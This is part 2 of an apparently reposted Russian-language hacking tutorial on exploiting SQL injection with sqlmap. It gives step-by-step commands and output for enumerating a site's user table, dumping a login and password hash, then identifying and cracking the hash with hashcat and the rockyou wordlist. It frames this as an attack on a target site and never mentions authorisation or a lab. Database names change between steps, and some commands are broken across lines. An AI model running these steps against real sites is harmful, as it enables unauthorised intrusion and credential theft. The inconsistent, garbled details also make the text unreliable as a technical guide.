SQLMAP-обнаружение и эксплуатация SQL инъекции: детальное разъяснение (2 часть)

SQLMAP-обнаружение и эксплуатация SQL инъекции: детальное разъяснение (2 часть)

@webware

t.me/webware

Это продолжение первой части

Шаг 4: Список столбцов в целевой таблице выбранной базы данных с использованием SQLMAP SQL инъекции:


Теперь нам нужно перечислить все столбцы целевой таблицы user_info базы данных clemcoindustries с помощью SQLMAP SQL инъекции. SQLMAP SQL инъекция упрощает выполнение следующей команды:

sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D
gbhackers-T user_i
nfo --columns

Это возвращает 5 записей из целевой таблицы user_info базы данных clemcoindustries.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'gbhackers '
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

Это именно то, что мы ищем ... user_login и user_password целевой таблицы.

Шаг 5: Список имен пользователей из целевых столбцов целевой таблицы выбранной базы данных с использованием SQLMAP SQL инъекции:


SQLMAP SQL инъекция - это просто! Просто снова запустите следующую команду:

sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D
gbhackers-T user_info -C user_login --dump

Угадайте что? Теперь у нас есть имя пользователя из базы данных:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Почти все, нам теперь нужен только пароль для этого пользователя.


столбцов целевой таблицы выбранной базы данных с использованием SQLMAP SQL инъекции:

Вероятно, вы уже привыкли использовать SQLMAP SQL инъекцию. Используйте следующую команду для извлечения пароля для пользователя.

sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D gbhackers-T
user_info -C user_password --dump


We have hashed password : 24iYBc17xK0e


[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

Но не спешите радоваться, этот пароль выглядит забавным. Это не может быть чьим-то паролем. Тот, кто оставляет свой сайт настолько уязвимым, просто не может иметь такой пароль.


Так оно и есть. Это хешированный пароль. Это значит, что пароль зашифрован, и теперь нам нужно его расшифровать.


Я рассказал о том, как расшифровать пароль на этих взламывающих пароли MD5, phpBB, MySQL и SHA1 с помощью Hashcat в посте про Kali Linux. Если вы пропустили его, то вы пропустили много.


Ниже я кратко расскажу ваш о том, как сделать это, но вы действительно должны научиться использовать hashcat.


Шаг 7: Взламывание пароля:

Таким образом, хешированный пароль выглядит следующим образом 24iYBc17xK0e. Но каким образом вы узнаете, какой тип хэша используется?


Определите тип хеша:

К счастью, Kali Linux предоставляет хороший инструмент, и мы можем использовать его, чтобы определить, какой это тип хэша. В командной строке введите следующую команду, а затем введите значение хеша:

hash-identifier

Превосходно. Таким образом, мы видим, что это DES(Unix) хэш.


Взломайте HASH с помощью cudahashcat:

Прежде всего, мне нужно знать, какой код использовать для хэшей DES. Итак, давайте проверим, что:

cudahashcat --help | grep DES

Так что это или 1500 или 3100. Но это была база данных MYSQL, поэтому значение должно быть 1500.


Я сохранил значение хеша 24iYBc17xK0e. в файле DES.hash. Ниже приведена команда, которую я запускаю:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Интересная находка: Обычный Hashcat не смог определить код для хэша DES. (не в меню справки). Однако оба cudaHashcat и oclHashcat нашли и взломали ключ.


Во всяком случае, вот взломанный пароль: abc123 24iYBc17xK0e. :abc123

Теперь у нас есть пароль для этого пользователя.

Источник codeby.net

Report Page